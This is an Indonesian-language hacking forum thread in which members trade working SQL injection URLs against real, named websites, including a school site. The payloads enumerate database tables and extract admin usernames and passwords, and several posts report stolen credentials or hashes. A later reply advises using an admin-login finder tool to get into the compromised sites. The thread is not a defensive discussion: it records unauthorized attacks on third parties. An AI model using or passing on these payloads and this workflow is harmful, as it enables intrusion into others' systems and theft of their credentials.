[TUTORIAL] SQL Injection Pada PHP

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
pujiyanto18
Posts: 37
Joined: Mon Feb 16, 2009 12:35 pm

Re: [TUTORIAL] SQL Injection Pada PHP

Post by pujiyanto18 » Sun Mar 14, 2010 12:13 pm

ji_bog wrote:
pujiyanto18 wrote:klo yg ini gmn mas
msh newbe nih....
:)

Code: Select all

http://www.smkn2bukittinggi.com/gallery.php?id=-5%20union%20select%201,2,3,4,5/*
panjang column nya sampai 8 bro :D
di bawah ini contohnya ^^
maaf ane cuma bisa bantu sampai di sini :D
maklum masih latihan juga

Code: Select all

http://www.smkn2bukittinggi.com/gallery.php?id=null%20union%20all%20select%201,group_concat%28table_name%29,3,4,5,6,7,8%20from%20information_schema.tables%20where%20table_schema=database%28%29
thx boy....

satube8
Posts: 4
Joined: Sun Feb 14, 2010 2:03 am

Re: [TUTORIAL] SQL Injection Pada PHP

Post by satube8 » Sun Mar 21, 2010 3:14 am

kalo ga bisa di sql injection, n sql injection basi pake cara apa yaa..

User avatar
ScootR_3086
Posts: 24
Joined: Sat Dec 08, 2007 9:24 am
Contact:

Re: [TUTORIAL]SQL Injection Pada PHP

Post by ScootR_3086 » Wed Mar 31, 2010 1:05 pm

[quote="apriliana"][quote="Broo"]butuh pencerahan donk bwt para master...

klo yg ini kira2 bs gk pke SqLi [url]http://zonetz.com/?q=dn&ref=&nwsid=67'[/url]

msi kebingungan nehh....[/quote]

mau jawban lgsg ato model hint neh?

hint nya:
1. cari tanda untuk ngasih komentar
2.cari agar hasil dr scripntny bernilai false..
3.baru cari magic numbernya...
mgkn kata2ku susah dipahami..

nih deh hasilnya silakan dipelajari perintah berikut
[code]http://zonetz.com/?q=dn&ref=&nwsid=67+a ... ,3,4,5,6--[/code][/quote]


tak cobain kok dapetnya aneh ya,,salah dmana ni ya??
"http//zonetz.com/?q=dn&ref=&nwsid=67+and+1=2+union+all+select+1,concat_ws(0x3a,nlogin,passwd),3,4,5,6+from+tbadmin--"

zonetzadmin:({�n����-N����l

ad simbol2 aneh.. :mati: :mati:

the_nox
Posts: 16
Joined: Wed Mar 31, 2010 7:29 am

Re: [TUTORIAL] SQL Injection Pada PHP

Post by the_nox » Mon Apr 05, 2010 6:06 pm

binggung neeh ,, wa nemuin error nya pada columb 100
trs yg sy mo tanyain apakah saya harus nulis kek gene http://sitekorban.com/news/news_detail.php?id=2092 union all select 1,2,3,4,5,6,7,8,9,------100--

soal nya kan kaloe di tutor kan dapet error nya pada order ke 4..
asli bingug banget neeh ...
newbie need help plsssssssssssssssssssssssss :gebrak:

Golek_ilmu
Posts: 4
Joined: Fri Nov 06, 2009 11:53 am

Re: [TUTORIAL] SQL Injection Pada PHP

Post by Golek_ilmu » Tue Apr 06, 2010 6:34 pm

mantap euy..... tutornya cocok kayak diriku yang masih cupu bgt..... mau jajal dulu gan....
Image

lokrepot
Posts: 1
Joined: Wed Apr 14, 2010 3:02 pm

Re: [TUTORIAL] SQL Injection Pada PHP

Post by lokrepot » Wed Apr 14, 2010 4:05 pm

BOS Q MASIH NEWBIE.... http://www.lbpl.in/news_detail.php?id=- ... OM+admin--
TU UDA KELUAR ADMINADM1N...
TRUS KLO MAU LOGIN GMN????

aa_him
Posts: 1
Joined: Wed Apr 21, 2010 9:27 pm

Re: [TUTORIAL] SQL Injection Pada PHP

Post by aa_him » Wed Apr 21, 2010 10:08 pm

la ketemu am temen seperjuangan lokrepot....

iya bos tlg pencerahannya....

thx...nice posting

black.golem
Posts: 1
Joined: Sat Apr 24, 2010 9:57 pm

Re: [TUTORIAL] SQL Injection Pada PHP

Post by black.golem » Sat Apr 24, 2010 11:44 pm

mao tanya dong,maklum newbie nie ,ane udah nyobain di web laen, n' bisa dapetin username ama passwordnya,tapi ane bingung nie ama passwordnya pake encrypt paan.. pke md5 bukan si???
nie kode'y:

7a88e86e1401d01b985dbc4b30c939dd1db46f34
:circle:

User avatar
xMikael
Posts: 18
Joined: Mon May 10, 2010 7:09 pm
Location: Stairway to Heaven

Re: [TUTORIAL]SQL Injection Pada PHP

Post by xMikael » Mon May 10, 2010 8:51 pm

Setelah mendapatkan username dan password untuk login page nya gimana caranya ya ?

Code: Select all

http://www.excellentdevelopment.com/news_detail.php?id=-145%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,GROUP_CONCAT%28TABLE_NAME%29,13,14,15,16,17,18,19,20,21,22%20FROM+INFORMATION_SCHEMA.columnS+WHERE+TABLE_name=0x41646D696E4D656E75--
habis udah kaya gini harus gimana ya ? malah muncul AdminMenu semua --a
♠ Love and magic have a great deal in common. They enrich the soul, delight the heart. And they both take practice. ♠

heri_mew
Posts: 17
Joined: Sun Apr 18, 2010 4:13 pm
Contact:

Re: [TUTORIAL] SQL Injection Pada PHP

Post by heri_mew » Tue May 11, 2010 12:31 pm

coba pake tool admin login finder

karena login admin belum tentu pake /admin/ tapi ada juga /cms/ ato /adminlogin.php/
lox pake tool bisa langsung masukkin aja URLnya nah tinggal kamu scan aja dimana halaman loginnya ngumpet

kayaknya senior2 dah bahas itu brulang kali koq :circle:

monggo silakan dicoba :devil

Post Reply

Return to “Web Hacking”